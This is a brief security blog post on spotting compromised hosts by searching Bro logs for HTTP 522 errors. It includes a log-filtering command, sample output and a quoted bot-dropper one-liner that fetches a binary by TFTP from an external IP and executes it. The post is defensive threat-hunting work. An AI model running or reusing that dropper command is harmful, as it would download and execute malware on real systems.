Recently I ran across a tweet from Packet Watcher @jinq102030 (https://twitter.com/jinq102030/status/756476442590842880)  to keep an eye on HTTP error code 522 for possible malware check-ins. 522 code could mean several things, but as for IR it's a potential malicious host has been pulled offline and you have a client still trying to connect.    So I got our Intern to check bro logs and see what he could find. 

>zcat http* | bro-cut ts id.orig_h id.resp_h host status_code | awk '$5 == "522"

1467159441.247406    192.128.1.216    104.27.182.19    -    522
1467160356.407366    192.128.1.216    104.27.183.19    -    522
1467161271.647320    192.128.1.216    104.27.183.19    -    522
1467163102.087490    192.128.1.216    104.27.183.19    -    522
1467164017.337316    192.128.1.216    104.27.183.19    -    522
1467164932.547084    192.128.1.216    104.27.182.19    -    522
….
1467182323.201685    192.128.1.216    104.27.182.19    -    522
1467183238.447046    192.128.1.216    104.27.183.19    -    522
1467184153.641505    192.128.1.216    104.27.183.19    -    522
1467185068.903194    192.128.1.216    104.27.182.19    -    522
…

There was other traffic that was false positives, but you could easily tell that this IP was checking this site on a regular basis.  Out of 4GB of compressed bro logs for the day we only had about  200 total lines that matched, so very low noise ratio.

When looking at the full packet capture of the system in question, we were able to tell that the system in question was compromised and downloaded a bot . 

cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g 91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh.

This is certainly something we are going to keep looking at for finding more compromised system.

--

Tom Webb

@twsecblog